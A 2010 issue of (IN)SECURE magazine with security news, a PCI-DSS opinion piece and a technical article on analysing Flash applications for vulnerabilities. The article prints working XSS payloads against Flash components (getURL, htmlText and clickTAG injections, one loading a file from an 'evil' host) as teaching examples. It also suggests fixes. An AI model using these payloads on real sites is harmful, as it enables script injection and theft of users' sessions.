It's been quite a ride since the April issue of (IN)SECURE. We've been to Infosecurity Europe in 
London and met some of our dedicated readers across the channel. We took in the sun at the IBM 
Innovate 2010 conference in Orlando and learned more about the future of information security 
and other transformations coming to many aspects of our computing-fueled lifestyle. 



As this issue is released, we're looking forward to going to the US for one of the premier technical 
events of the year - Black Hat Briefings & Training 2010. If you're in Las Vegas, don't forget to join 
us for drinks at the Qualys party on July 28 at the Jet, it's going to be amazing! 

A big thanks goes to everyone who submitted their material for this issue, there's truly a lot of 
talented people in the information security field. Keep it coming! 

Mirko Zorz 
Google now supports encrypted search 

Google has rolled out SSL encryption for Google Search. The option is currently in beta, so 
users are not automatically redirected to https. Over the years Google has added SSL support 
to its portfolio of online products, most notably making it the default for all Gmail users in 
early 2010. (www.net-security.org/secworld.php?id=9323) 



Wi-Fi security patent granted for dynamic authentication and encryption 

Ruckus Wireless has been granted a patent by the USPTO for a technique that simplifies the 
configuration and administration of wireless network security while strengthening it. The 
technique eliminates the tedious and time-consuming manual installation of the encryption keys, 
passphrases or user credentials needed to securely access a wireless network. 
(www.net-security.org/secworld.php?id=9326) 



Findings of the Q1 2010 State of the Web security report 

Zscaler's newly released Q1 2010 State of the Web report details the enterprise threat 
landscape and the variety of Web-based issues plaguing Internet users. Among numerous 
findings, the report details several growing threat vectors, including attackers leveraging 
search engines and the growing fake anti-virus threat. (www.net-security.org/secworld.php?id=9335) 



Q&A: Symantec's acquisitions and the future 



Francis deSouza is senior vice president of the Enterprise Security Group at Syman- 
tec. In this interview he discusses Symantec's recent acquisitions, how they mitigate 
cloud computing and social networking threats, as well as Symantec's plans for the 
near future. (www.net-security.org/article.php?id=1442) 




Critical vulnerabilities in Photoshop CS4 

Critical vulnerabilities have been identified in Photoshop CS4 11.01 and earlier for 
Windows and Macintosh that could allow an attacker who successfully exploits these 
vulnerabilities to take control of the affected system. A malicious .ASL, .ABR, or .GRD 
file must be opened in Photoshop CS4 by the user for an attacker to be able to exploit 
these vulnerabilities. (www.net-security.org/secworld.php?id=9350) 




Critical iPhone security issue leaves your contents exposed 



Bernd Marienfeld has discovered that the passcode protection can be bypassed by simply 
connecting the iPhone 3GS in question to a computer running Ubuntu 10.04. According to him, 
the iPhone can be tricked into allowing access to photos, videos, music, voice recordings, the 
Google Safe Browsing database, game contents and more. (www.net-security.org/secworld.php?id=9352) 



The risks when networks collide 



The increasing convergence of multiple networks for voice, data, video and other services onto 
a single IP-based infrastructure has the potential to leave serious gaps in security. New 
research from the ISF identifies the potential risks and rewards of convergence and details 
four key steps to secure converged networks. (www.net-security.org/secworld.php?id=9356) 



IT pros are hacking their own enterprises to keep intruders out 

A survey of IT security professionals has discovered that 83% consider commer- 
cial applications to be riddled with code flaws and vulnerabilities. As a result, se- 
curity professionals are making heavy investments in penetration and code test- 
ing, combined with application scanning, to try and build security into the soft- 
ware. (www.net-security.org/secworld.php?id=9358) 




Popular websites distribute spyware-infected Mac software 



A spyware application that is installed by a number of freely distributed Mac applications 
was found on a variety of websites. OSX/OpinionSpy performs a number of malicious actions, 
from scanning files to recording user activity, as well as sending information about this 
activity to remote servers and opening a backdoor on infected Macs. 
(www.net-security.org/malware_news.php?id=1362) 
U.S. Senators keep trying to give "cyber emergency" powers to federal government 

When the officials "playing" the roles of various decision-makers tried to 
shutdown cell phone and Internet services to prevent a cascading effect, 
they discovered that federal agencies actually don't have the authority to 
do so, and that companies providing these services might be unwilling to 
do it when asked. (www.net-security.org/secworld.php?id=9365) 



Samsung smartphone shipped with malware-infected memory card 

The Samsung S8500 Wave phone, running the Samsung bada mobile platform, has been found being 
shipped to customers with malware on its 1GB microSD memory card. The malicious file is 
accompanied by an Autorun.inf file, which installs the malware on any Windows PC that still 
has the autorun feature enabled. (www.net-security.org/malware_news.php?id=1364) 



Facebook fights rogue apps with verification program 



In view of all the rogue applications that have targeted Facebook users, the an- 
nouncement that the social network will require developers to verify their account 
(by confirming their mobile phone or adding a credit card) in order to create new 
applications is a welcome one. (www.net-security.org/secworld.php?id=9367) 



Top 5 FIFA World Cup online risks 

Lavasoft warned computer users to be aware of stealthy online traps set by cyber- 
criminals to leverage public interest surrounding the 2010 FIFA World Cup - and issued 
advice to follow to make sure people enjoy the month-long tournament without becom- 
ing the target or victim of an attack. (www.net-security.org/secworld.php?id=9368) 



Rootkits on Android smartphones 

Nicholas Percoco and Christian Papathanasiou, two security researchers from 
Trustwave, have recently announced that they came up with a proof-of-concept 
kernel-level rootkit in the form of a loadable kernel module, with the help of which 
they will demonstrate an attack on an Android smartphone at the DefCon conference next 
month. (www.net-security.org/secworld.php?id=9371) 



Critical Adobe Flash, Reader 0-day flaw exploited in the wild 

A zero-day flaw affecting the 10.0.x and 9.0.x versions of Adobe Flash Player - including the 
current version, 10.0.45.2 - has been spotted being exploited in the wild. The flaw also 
affects Adobe Reader and Acrobat 9.3.2 and earlier 9.x versions, since the vulnerable 
authplay.dll component ships with those products. (www.net-security.org/secworld.php?id=9373) 
U.S. intelligence analyst arrested for passing on classified items to Wikileaks 



A 22-year old Army intelligence analyst has been arrested by U.S. Federal officials 
after he boasted about providing Wikileaks with combat videos (including that of the 
helicopter attack made public by the site in April) and a massive amount of classified 
State Department records. (www.net-security.org/secworld.php?id=9374) 



The termination of a spyware business 



The FTC is announcing a settlement that bars the sellers of the "RemoteSpy" 
keylogger from advertising that the spyware can be disguised and installed on 
someone else's computer without the owner's knowledge. It requires that the 
software provide notice that the program has been downloaded and obtain con- 
sent from computer owners before the software can be installed. 
(www.net-security.org/malware_news.php?id=1368) 



1 in 10 IT pros cheat on an IT audit 



According to a recent survey of 242 IT professionals mainly from organizations 
employing 1000 to 5000+ employees, 1 in 10 admitted that either they or a col- 
league have cheated to get an IT audit passed. Amongst the cheaters, lack of time 
and resources are cited as the main reasons, underlining the ever increasing pres- 
sure on today's IT departments. (www.net-security.org/secworld.php?id=9378) 



114,000 iPad owners' emails and account IDs exposed 

News that vulnerabilities on the AT&T network allowed a group calling itself Goatse Security 
to harvest the emails and AT&T authentication IDs of 114,000 early adopters of Apple's iPad 
shocked potential victims. Goatse Security has a history of warning about security 
vulnerabilities, and they managed to get their hands on the data by using a script against 
AT&T's website. (www.net-security.org/secworld.php?id=9392) 



Mass SQL injection attack compromises IIS/ASP sites 

Thousands of websites and who knows how many visitors were affected by the re- 
cently discovered mass SQL injection attack that targeted - among others - The Wall 
Street Journal and The Jerusalem Post websites. Further investigation into the matter 
revealed the common denominator: all affected sites are hosted on IIS servers and use 
ASP.NET. (www.net-security.org/secworld.php?id=9395) 



0-day Windows flaw published by Google researcher 



Tavis Ormandy, the well-known Google security researcher who discovered the 
feature/vulnerability in Java and forced Sun to patch it up swiftly by releasing the 
details to the public - has done it again. The vulnerability exists in the Windows 
Help and Support Center function (helpctr.exe) and affects only Windows XP and 
Windows Server 2003. (www.net-security.org/secworld. php?id=9401) 
PCI: Security's lowest common denominator 




by Dimitri McKay 




"Lowest Common Denominator" (as defined by Webster's Dictionary) is 
"often used to indicate a lowering of quality resulting from a desire to find 
common ground for many people." 



Frankly, I think this description is lacking. I 
was never great with math, but I do know net- 
work security. And I know that the current PCI- 
DSS standards require the absolute minimum 
level of security. 

Heartland Payment Systems suffered what was, to date, the 
largest breach in history, with tens of millions 
of credit and debit card records stolen. Yet the 
company had been deemed PCI compliant 
just weeks before. The CEO of Heartland 
Payment Systems knew that PCI wasn't 
enough to secure Heartland against a sophis- 
ticated cyber attack, and even admitted it on 
an earnings call with analysts on November 4, 
2008. 

He said, "We also recognize the need to move 
beyond the lowest common denominator of 
data security, currently the PCI DSS stan- 
dards for processing secure transactions, one 
which we have the ability to implement without 
waiting for the payments infrastructure to 
change." The CEO of the corporation who suf- 
fered the largest credit card data breach in 



history readily confirmed that "PCI compliance 
doesn't mean secure." 

Instead of going the extra mile and erring on 
the side of safety, Heartland's executives ig- 
nored the warning signs and took the cheap- 
est route. They treated PCI like the 'ceiling' 
when it should be the 'floor' for security. That's 
unfortunate, knowing how profitable the credit 
card business can be. 

Now, PCI DSS has been a great way to force 
the enterprise into creating a budget for and 
rolling out security. However, these budgets 
are being spent not on the best security solu- 
tions, but on specific security products that are 
outlined in particular PCI controls. 

It's a catch-22: the only way for an IT group to 
advance its security program beyond the 
baseline requirements is to justify the spend, 
yet the only justification people have is PCI. 
PCI is just too bare-boned when it comes to 
prescribing good security. 



For too long the question has been "how does 
this make us compliant?" - instead of "how 
does this make us safer?" PCI has forced 
companies to do more, but not enough. If PCI 
is going to be a standard, we should raise the 
bar on that standard. 

Of the breaches in 2009, 81% of vendors 
were not PCI compliant. To be clear, that 
means that 81 % of the vendors couldn't even 
attain the lowest level of security required. 
Heartland was PCI compliant, and yet they 
were still not secure. Also, 41% of businesses 
couldn't even pass a PCI audit of the 2006 
standards - never mind the current standards. 



Most people forced to bring a company up to 
PCI compliance have lost sight of the original 
goal. PCI DSS was created as a way of reducing 
security breaches and credit card fraud, 
because consumers were losing faith in 
their credit cards. The problem is that assessors 
often focus only on the actual controls of 
PCI, and not on the spirit in which PCI was created. 
They simply don't understand why PCI was 
written, or what sort of risk it was built to mitigate. 

Obviously PCI compliance won't make it im- 
possible for hackers to steal data. However, it 
should make it harder. 






As Dr. Anton Chuvakin would say: "Security 
first, compliance is the result." Unfortunately, 
the mindset of the enterprise is to fear not the 
hacker, but the auditor. And that's not the right 
mentality to have. PCI DSS shouldn't be the 
basis of an information security policy. Just 
think about it - that's asking VISA and Mas- 
terCard to define your security policy while ig- 
noring other major threats. That's madness. 
Complacency that stems from compliance to 
a standard is unacceptable. 

As someone who helps customers attain PCI- 
DSS compliance, I've witnessed on more than 
one occasion an executive say "I might get 
fined, but that's a risk I can take." What? 
That's your concern? The fine? That's an epic 
fail. It is the attacker you need to be con- 
cerned with. Sure, PCI will fine you, but that's 
just money. What about a public breach, what 
about the damage to company image, the 
damage to your customers or even the 
damage to employee PII? 

Now don't get me wrong. I appreciate PCI, 
because it continues to push that 90% of 
companies that are below the acceptable level 
of security, into spending money on a base- 
line. PCI in its current revision is not perfect, 
but it has certainly forced a number of compa- 
nies to step up. The industry is safer with PCI. 

The imperative for companies is to concen- 
trate on baseline security, not on PCI-scope- 
related-checkbox-security. Use PCI as the 
lowest common denominator, and go well be- 
yond that. Don't fear the auditor, fear the 
hacker, and adjust your security for that. The 
fine from PCI is much less of a threat than the 
negative media coverage and damage control that 
come with a data breach. 

We can do better. 



Dimitri McKay is a Security Architect at LogLogic (www.loglogic.com). He is a Log Evangelist working with 
LogLogic customers to identify and alleviate challenges in forensics, operations or compliance with industry 
mandates and government regulations. He is a public speaker, blogger, and writer for both industry and trade 
publications in print and digital format. 
Tired of seeing your employees and customers being phished? 



With many targeted phishing attacks making it past some of the best 
anti-spam filters, users have become the last line of defense against 
phishing. Visit our website and find out how our fun and effective train- 
ing solutions can significantly reduce the chance of your employees 
and customers falling for phishing attacks. 

With the most comprehensive suite of anti-phishing training and filter- 
ing solutions, Wombat Security Technologies has established itself 
as a global leader in the fight against phishing. Our solutions have 
been licensed for use in sectors as diverse as finance, government 
and health care to name just a few. 

Contact us at sales@wombatsecurity.com and find out how our so- 
lutions can help effectively train your employees and customers. 



www.wombatsecurity.com 
Analyzing Flash-based RIA components and discovering vulnerabilities 

by Rishita Anubhai and Shivang Bhagat 



The development of the Information Web can be presented synoptically as: 

Web 1.0 
• Static web pages 
• Minimal client 'back to' server interaction 
• Weak user end in terms of capabilities 

Web 2.0 
• Interactivity is the keyword 
• AJAX, Flash, Silverlight, RIA 
• Blogs, wikis, social networking applications 

Figure 1 - Quick comparison between Web 1.0 and Web 2.0. 



Furthermore, depending on the perspective of 
various people, the next era will most likely be 
about "living" on the web with virtual worlds, 
avatars and the like. Hence in this scenario, 



where "interactivity" and "RIA (Rich Internet 
Applications)" are the key terms for any functionality 
on the web (as shown in Figure 1 - 
Web 2.0), client side technologies have also 
evolved to keep pace with the changing demands. 
Client side scripting makes interaction 
not just possible but also smooth for 
the client, without having to go to the server 
for every little interaction the user performs. 
One of these client side technologies 
is Flash - the topic of this 
paper. Flash was initially centered on passively 
providing animations and movies for the 
end user. From there it grew to incorporate 
procedural features through the scripting 
language ActionScript 1.0 and 2.0. Today it 
runs ActionScript 3.0, an object oriented scripting 
language that supports high-end interactivity 
features and programming (as shown in 
Figure 2). 

But as a technology matures, so does the 
malicious interest in it, and that is 
precisely why the domain of Flash applications 
and their security needs to be 
looked into. 



Flash providing passive movies and animations -> Procedural support: ActionScript 1.0 and 2.0 -> Object oriented scripting support: ActionScript 3.0 

Figure 2 - Flash technology transformation. 



A closer look at Adobe's major initiatives 

The three major initiatives taken by Adobe 
with respect to this domain are: 

• Flash 

• Flex 

• Adobe Integrated Runtime (AIR). 



While Flash and Flex provide facilities for 
building interactive applications with subtle dif- 
ferences as highlighted below, AIR covers a 
larger sphere. 

The subtle differences between Flash and 
Flex can be summarized thus: 



Flash 
• Centered on animation with respect to time; the predominant feature is therefore timeline-based development. 
• The framework and environment are relatively free, and developers can approach it from various perspectives. 
• Target developers are those with an artistic motive. 

Flex 
• Centered on the development of Rich Internet Applications (RIA); the predominant features are therefore user interface and interaction elements. 
• A project framework is provided. 
• Insistence on extending Flex classes and following the programming framework, unlike the creative freedom in Flash. 
• Target developers are those building web and RIA applications. 

Table 1 - Quick view: Flash vs. Flex. 



The architecture of the Flash and Flex applica- 
tions is similar and so shall be discussed in 
the next section with interchangeable names 
unless specified otherwise. On the other hand, 
AIR provides a platform for the development 
of Rich Internet Applications with a variety of 
technologies which include: Flash, Flex, HTML 
and Ajax. 



AIR applications have been viewed as easy 
yet powerful to use, and the platform is a boon 
to developers, who can build innovative 
applications more easily, with 
minimal changes, and have the same application 
also work offline as a desktop 
application. 
Architecture of Flash-based applications 

The bigger picture: Basic Web application 
architecture 

Web applications are generally based on a 
three-tier approach, which can be extended to 
n-tier as per the individual requirements of the 
application. The three tiers are shown in 
Figure 3 below. 

When it comes to a thin client, the Presenta- 
tion (Browser Display) is the only layer located 



on the client, whereas the other two layers re- 
side on the server. But, when thick clients are 
involved, they are used to their full capacity by 
having parts of the Application layer also on 
the client. Forrester Research, a major 
technology-consulting firm, called this concept 
"The Executable Internet or the X Internet". As 
a result, client side scripts that execute com- 
pletely on the client and within the browser 
have been introduced. 

Moreover, the above architecture can be ex- 
panded as and when needed to have more 
layers depending on the business logic 
involved and other such aspects. 



Presentation - browser elements 
Application - scripts written pertaining to the application 
Storage - database and other storage 

Earlier thin clients kept only the Presentation layer on the client; Web 2.0 thick clients also hold part of the Application layer on the client. 

Figure 3 - Application layers. 



Architecture of Flash as an X Internet Tool 

Flash is one of the tools of the Executable 
Internet. As mentioned earlier, it 
began as a utility for web animation and has 
become one that supports the robust object 
oriented scripting language ActionScript and 
can be used to develop applications that allow 
the user to interact with the application. 

In this architecture, the scripts that run on the 
client allow for smoother execution of certain 
actions in response to the user, without requir- 
ing frequent communication with the server. In 
this respect, Flash effectively provides a rich 
layer of interactive programmability on top of 
the existing HTML page standards. This is 
also the primary reason why the concept of 
Rich Internet Applications was coined. 

For example, without using the "Back" button 
and resending requests, the user can keep 
changing the features he wants on a Flash- 
based web application for buying a new car. 
On each change, the current combination of 



features would be modeled and shown to the 
user in a corner almost immediately without 
having to submit the list each time to the 
server and waiting for a reply to the same. 

• In Figure 4, the Front End of these applica- 
tions comprises of the browser along with the 
required plug-in for the Flash player. 

• Scripts then allow interaction and guide the 
user through the displayed Flash Web applica- 
tion. To run the scripts, continuous communi- 
cation with the server is not required, unless 
another URL is explicitly needed (as will be 
seen later when discussing the getURL 
function). 

• At the Back End, as and when needed, calls 
are made to the server via application service 
protocols. Application protocols are those that 
operate as a layer on top of the TCP/IP stack 
and provide mechanisms for RIA communica- 
tions as highlighted in the block diagram on 
the following page. 
Flash scripts run solely on the client and interact with the client to give responses as coded in the script. The Flash web application is loaded from the server; subsequent communication with the server occurs via application service protocols such as JSON and AMF. 

Figure 4 - Communication within a Flash-based RIA. 



• XML is simple to understand and supported 
on a much wider scale than JSON and AMF 
(detailed below). As a result, APIs published 
for a web application commonly provide XML 
interfaces, which are easy to adopt, and 
JSON and AMF can then be layered on top 
if required. 

• JSON (JavaScript Object Notation) is a 
much more efficient format, designed 
especially for the JavaScript language. 
Despite this, it is not strictly dependent on 
JavaScript and has parsers for most 
programming languages. 

• AMF (Action Message Format) is Adobe's 
own RPC (Remote Procedure Call) format, 
used predominantly for the remote communication 
of Flash and Flex web applications. An AMF 
exchange comprises actions such as gateway 
connection, service access and callback 
method access, followed by further processing, 
after which the response is sent back. It is 
widely used in Rich Internet Applications. 

• Of these protocols/structures, JSON and 
AMF are more efficient than XML. On the 
other hand, they require support for their 
specific encoding and decoding. The choice 
then depends on the platform: AJAX is more 
likely to use JSON, while it is more natural 
for Flash and Flex applications to use AMF. 
The final choice rests with the developers 
and designers of the individual services. 

This summarizes how web applications, and 
specifically Flash-based applications, work, 
and the mechanisms that support the 
functioning of these applications - 
providing users with a richer experience 
on the Internet and a smoother one, with fewer 
round trips to the server and shorter waiting 
times. 
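The AMF description above stays at the level of "Adobe's own RPC format". The following is an added example, not code from the article or from Adobe: a minimal AMF0 encoder/decoder in Node.js for the value types that dominate Flash/Flex remoting traffic (number, boolean, string, null, strict array, object). The type markers and byte layout follow Adobe's published AMF0 specification; the sample call is constructed here. The bounds checks are the part a practitioner should note: a remoting gateway decodes attacker-supplied bytes, so truncated input, oversized counts and deep nesting must fail cleanly rather than read past the buffer.

```javascript
// Added example, not code from the article: a minimal AMF0 codec in Node.js.
// Type markers follow Adobe's AMF0 specification; anything else is rejected.
'use strict';

const AMF0 = { NUMBER: 0x00, BOOL: 0x01, STRING: 0x02, OBJECT: 0x03, NULL: 0x05, ARRAY: 0x0a, OBJECT_END: 0x09 };

// UTF-8 string with a 16-bit big-endian length prefix (AMF0 "short string").
function utf8Short(s) {
  const body = Buffer.from(s, 'utf8');
  if (body.length > 0xffff) throw new RangeError('string too long for an AMF0 short string');
  const len = Buffer.alloc(2);
  len.writeUInt16BE(body.length, 0);
  return Buffer.concat([len, body]);
}

function encodeAmf0(value) {
  if (value === null) return Buffer.from([AMF0.NULL]);
  if (typeof value === 'number') {
    const b = Buffer.alloc(9);
    b[0] = AMF0.NUMBER;
    b.writeDoubleBE(value, 1);           // all AMF0 numbers are IEEE-754 doubles
    return b;
  }
  if (typeof value === 'boolean') return Buffer.from([AMF0.BOOL, value ? 1 : 0]);
  if (typeof value === 'string') return Buffer.concat([Buffer.from([AMF0.STRING]), utf8Short(value)]);
  if (Array.isArray(value)) {
    const head = Buffer.alloc(5);
    head[0] = AMF0.ARRAY;
    head.writeUInt32BE(value.length, 1); // strict array: 32-bit count, then the elements
    return Buffer.concat([head, ...value.map(encodeAmf0)]);
  }
  if (typeof value === 'object') {
    const parts = [Buffer.from([AMF0.OBJECT])];
    for (const [k, v] of Object.entries(value)) parts.push(utf8Short(k), encodeAmf0(v));
    parts.push(Buffer.from([0x00, 0x00, AMF0.OBJECT_END])); // empty key + object-end marker
    return Buffer.concat(parts);
  }
  throw new TypeError('unsupported value type: ' + typeof value);
}

// Decoder with a bounds check on every read: a remoting gateway parses attacker
// controlled bytes, so truncated input, huge counts and deep nesting must fail cleanly.
function decodeAmf0(input) {
  const buf = Buffer.isBuffer(input) ? input : Buffer.from(input);
  let pos = 0;
  const need = (n) => { if (pos + n > buf.length) throw new RangeError('truncated AMF0 at offset ' + pos); };
  const readShortString = () => {
    need(2);
    const n = buf.readUInt16BE(pos); pos += 2;
    need(n);
    const s = buf.toString('utf8', pos, pos + n); pos += n;
    return s;
  };
  const readValue = (depth) => {
    if (depth > 32) throw new RangeError('AMF0 nesting too deep');
    need(1);
    const marker = buf[pos++];
    switch (marker) {
      case AMF0.NUMBER: { need(8); const v = buf.readDoubleBE(pos); pos += 8; return v; }
      case AMF0.BOOL:   { need(1); return buf[pos++] !== 0; }
      case AMF0.STRING: return readShortString();
      case AMF0.NULL:   return null;
      case AMF0.ARRAY: {
        need(4);
        const count = buf.readUInt32BE(pos); pos += 4;
        if (count > buf.length - pos) throw new RangeError('array count exceeds remaining bytes');
        const out = [];
        for (let i = 0; i < count; i++) out.push(readValue(depth + 1));
        return out;
      }
      case AMF0.OBJECT: {
        const obj = {};
        for (;;) {
          const key = readShortString();
          if (key === '') {                 // empty key announces the object-end marker
            need(1);
            if (buf[pos++] !== AMF0.OBJECT_END) throw new Error('malformed object terminator');
            return obj;
          }
          if (key === '__proto__') throw new Error('refusing prototype-polluting key');
          obj[key] = readValue(depth + 1);
        }
      }
      default:
        throw new Error('unsupported AMF0 marker 0x' + marker.toString(16) + ' at offset ' + (pos - 1));
    }
  };
  const value = readValue(0);
  if (pos !== buf.length) throw new RangeError('trailing bytes after AMF0 value');
  return value;
}

// Constructed sample of the kind of object a Flex client might send to a remoting service.
const SAMPLE_CALL = { user: 'alice', id: 42, admin: false, tags: ['a', 'b'], note: null };
```

Round-tripping SAMPLE_CALL through encodeAmf0 and decodeAmf0 returns an equal object; cutting the last three bytes (the object-end marker) off the encoded buffer makes decodeAmf0 throw instead of returning a partial object, which is the behaviour to look for when fuzzing a gateway during the protocol analysis described later in the article.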

The Flash security model in a nutshell 

The Flash security model has two main 
concepts: 

• Stakeholders - This concept details the 
rights of various people involved in a Flash 
application from different perspectives, such 
as developers, web site administrators and 
end users. 

• Sandboxes - This concept helps in 'fencing' 
each accessibility area of the SWF files i.e. to 
restrict their access to a limited virtual web 
area and files. There are various types of 
sandboxes depending on the area of concern. 
Stakeholders' hierarchy - Adobe Flash security model (highest to lowest): 

• Administrator settings - responsible for the security settings applied during the installation of the working environment. 

• User settings - control specific security settings customized per user and associate trusted status with a specific set of files. 

• Website settings - control access to server content based on policy files, which specify the permitted domains outside the sandbox. 

• Author settings - access to cross-scripting APIs; can allow data requests and responses across domains. Lowest in the hierarchy: the domains allowed here can be superseded by policy files. 

Figure 5 - Summarizing the stakeholder concept of the Flash security model. 



Sandbox classification: 

• With file-system - permits the SWF in this sandbox to access only other files on the local file-system. 

• With networking - permits the SWF in this sandbox to access only files on external domains on the network. 

• Trusted - permits both, i.e. access to the local file-system as well as to network domains. 

• External - permits access to the same domain only; for access to other domains, strict procedures (policy files) are needed. 

Figure 6 - Synopsis of the sandbox model of Flash security. 
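The policy files referred to in Figures 5 and 6 are the crossdomain.xml files a site serves to tell the Flash Player which origins may read its responses. The following is an added example, not code from the article: a small audit routine that flags the settings which widen the sandbox. Both policies are constructed, app.example.com is a placeholder host, and the element and attribute names (allow-access-from, secure, site-control, allow-http-request-headers-from) are Adobe's, while the risk wording and thresholds are this example's own.

```javascript
// Added example, not code from the article: audit a Flash cross-domain policy
// (crossdomain.xml) for settings that widen the sandbox.
'use strict';

// Constructed sample: an over-permissive policy of the kind commonly found in the wild.
const WEAK_POLICY = `<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>`;

// The same policy tightened to a single named origin (app.example.com is a placeholder).
const STRICT_POLICY = `<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="app.example.com" secure="true"/>
</cross-domain-policy>`;

// Pull name="value" pairs out of one start tag (regex is enough for this flat format).
function attrs(tag) {
  const out = {};
  const re = /([\w-]+)\s*=\s*"([^"]*)"/g;
  let m;
  while ((m = re.exec(tag)) !== null) out[m[1]] = m[2];
  return out;
}

// Returns a list of human-readable findings; an empty list means nothing was flagged.
function auditCrossDomainPolicy(xml) {
  const findings = [];
  const elements = xml.match(/<(allow-access-from|allow-http-request-headers-from|site-control)\b[^>]*>/g) || [];
  for (const el of elements) {
    const name = el.match(/^<([\w-]+)/)[1];
    const a = attrs(el);
    if (name === 'site-control' && a['permitted-cross-domain-policies'] === 'all') {
      findings.push('site-control: meta-policy "all" lets any policy file on the host grant access');
    }
    if (name === 'allow-access-from') {
      const d = a.domain || '';
      if (d === '*') {
        findings.push('allow-access-from domain="*": any site can read responses sent with the victim\'s cookies');
      } else if (d.startsWith('*.')) {
        findings.push('allow-access-from ' + d + ': every subdomain is trusted, including ones an attacker may control');
      }
      if (a.secure === 'false') {
        findings.push('secure="false": a policy served over HTTPS is honoured by SWFs loaded over plain HTTP');
      }
    }
    if (name === 'allow-http-request-headers-from' && a.domain === '*' && (a.headers || '') === '*') {
      findings.push('allow-http-request-headers-from domain="*" headers="*": any origin may send arbitrary request headers');
    }
  }
  return findings;
}
```

Run against WEAK_POLICY the audit returns four findings; against STRICT_POLICY it returns none. The wildcard-domain finding is the one that matters most during a pentest, since a site that serves it while also using cookie-based sessions has effectively opted out of the same-origin protection the External sandbox is meant to give.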



Approaches for security analysis 

The analysis of a Flash application from a se- 
curity point of view can be based on two 
approaches: 

• Reverse engineering Flash components 

• Protocol analysis. 



I. Reverse engineering Flash components - 
Tool support: SWFDump 

Reverse engineering Flash components consists 
of starting from the .swf file (the final 
Flash file executed by the player) and working backwards 
to a point from which the security analysis can 
be done methodically, by understanding the 
exact working mechanism of the .swf file. 
Case Study 1: Scripts causing XSS with Flash-based components 

A. getURL based XSS 

Unassigned global variables, such as 
those beginning with _root.* or _level0.*, 
can be given values by query string 
parameters. These variables, and the Flash 
file's other variables (popularly known as 
'flashvars'), can be set and manipulated 
in this manner via the query string. Once a 
malicious user can do that, these variables 
can be injected into functions such as 
getURL, which requests whatever URL is 
supplied as its parameter. Hence the 
variables could be made to hold 
an executable script, such as a simple JavaScript 
alert, and when injected into getURL an XSS 
(Cross Site Scripting) attack takes 
place. It is easy to detect such a flaw by 
looking at the disassembly of a simple .swf 
file produced by SWFDump. The file merely 
shows how a lack of validation allows a JavaScript 
command to be passed to 
the getURL function and executed. 

The gravity of the danger posed by one such 
vulnerability can be estimated by considering how 
payloads other than simple alerts (such as 
key-loggers, cookie thieves, etc.) could be 
planted through the same manipulation. Consider 
the following .swf file as it runs: 



Figure 7 - Simple XSS: test3.swf (application/x-shockwave-flash), served from a local test host and opened in Internet Explorer, pops a JavaScript alert as soon as the .swf runs. 

To analyze the file methodically, SWFdump is run on this file and the following is seen: 



C:\Users\Rishita\swf test>swfdump -D test3.swf 
[002]    52 DEFINESHAPE defines id 0002 
         fillstyles(02) linestyles(00) 
           1) BITMAP 65535 
           2) BITMAP 1 
         fill: 00/02 line:00 - moveTo 338.35 285.40 
         fill: 00/02 line:00 - lineTo 208.88 285.40 
         fill: 00/02 line:00 - lineTo 208.88 177.65 
         fill: 00/02 line:00 - lineTo 338.35 177.65 
         fill: 00/02 line:00 - lineTo 338.35 285.40 
[01a]     6 PLACEOBJECT2 places id 0002 at depth 0001 
         Matrix 
           1.000  0.000  0.00 
           0.000  1.000  0.00 
[001]     0 SHOWFRAME 1-6 
[00c]    34 DOACTION 
         ( 31 bytes) action: Push String:"javascript:alert('HI')" String:"_self" 
         (  1 bytes) action: GetURL2 
         (  0 bytes) action: End 
[001]     0 SHOWFRAME 7-14 
[01c]     2 REMOVEOBJECT2 removes from depth 0001 
[00c]     2 DOACTION 
         (  0 bytes) action: Stop 
         (  0 bytes) action: End 
[001]     0 SHOWFRAME 15 
[000]     0 END 

C:\Users\Rishita\swf test> 

The P-codes show the sequence to be the pushing of a string containing JavaScript, followed by that same string being taken as the parameter to getURL. Without any checks, executed in sequence this causes the XSS attack to succeed. 
The SWFDump output shows the sequence in 
which the instructions execute, which is 
useful in an analysis whose aim is to spot 
security loopholes. Similarly, if decompiler 
tools are used (the above was a disassembly, 
which brought us down to the level of opcodes), 
the code could reveal a line such as: 

getURL(_root.input); 

The correction is to validate the string or 
flashvar going into the getURL function, at the 
very least by checking that it begins with 
http:// or https://. Additional mechanisms to 
escape strings and reject characters such as 
'<' or '>' can also be added. 

B. HTML tag based injection 

It is possible to allow a Flash file to access HTML tags and processes at runtime. If this statement has not already indicated the potential for major security breaches, the following discussion shall explicitly highlight it. 

This attack can be achieved only if the developer has set htmlText to true. Although Flash supports very few HTML tags, an attacker can (and most likely will) inject these and exploit the few entry points that are permissible. Consider the following scenario: HTML content is enabled initially and the input is then passed as a parameter to the getURL function discussed above. 

    _root.htmlText = true; 
    getURL(_root.input); 

This is an entry point for an attack right away. It can be exploited in one of the following ways: 

    http://www.example.com/test_flash.swf?input=<a href="javascript:alert('XSS')">Click</a> 

    http://www.example.com/test_flash.swf?input=<img src="http://evil/evil.swf"> 

    http://www.example.com/test_flash.swf?input=<img src="javascript:alert('XSS')//.swf"> 

Note how the '//' before the .swf turns it into a comment as far as JavaScript execution is concerned. 

Each of these on execution will create and attach the tags and run inside the browser's DOM context. As discussed previously, this exploit can be stretched beyond the simple alert command. 

C. clickTAG XSS attack - famous Flash attack due to banner advertisements 

The clickTAG is made for tracking the number of clicks on advertisement banners on the web. It is possible to inject script into this tag as its value. Consider the following code: 

    on (release) { 
        getURL(clickTAG, "_top"); 
    } 

Legitimately, it will be called in the following way, i.e. tracking is done each time a click occurs. This could later be used to build statistics of the number of clicks and the popularity of the advertisement. 

    <embed src="http://www.example.com/Banner.swf?clickTAG=http://www.example.com/track?http://www.example.com"> 

But an attacker can cause XSS by passing a value like the one below. 

    http://www.example.com/Banner.swf?clickTAG=javascript:alert('XSS') 

D. Exploit by asfunction used in conjunction with unsafe Flash methods 

The asfunction protocol handler is similar to the JavaScript protocol handler: asfunction causes a function in the Flash file to be executed. But there are a few unsafe functions in Flash, listed below: 

- loadVariables() 
- loadMovie() 
- getURL() 
- loadMovieNum() 
- FScrollPane.loadScrollContent() 
- LoadVars.load() 
- LoadVars.send() 
- LoadVars.sendAndLoad() 
- MovieClip.getURL() 
- MovieClip.loadMovie() 
- NetConnection.connect() 
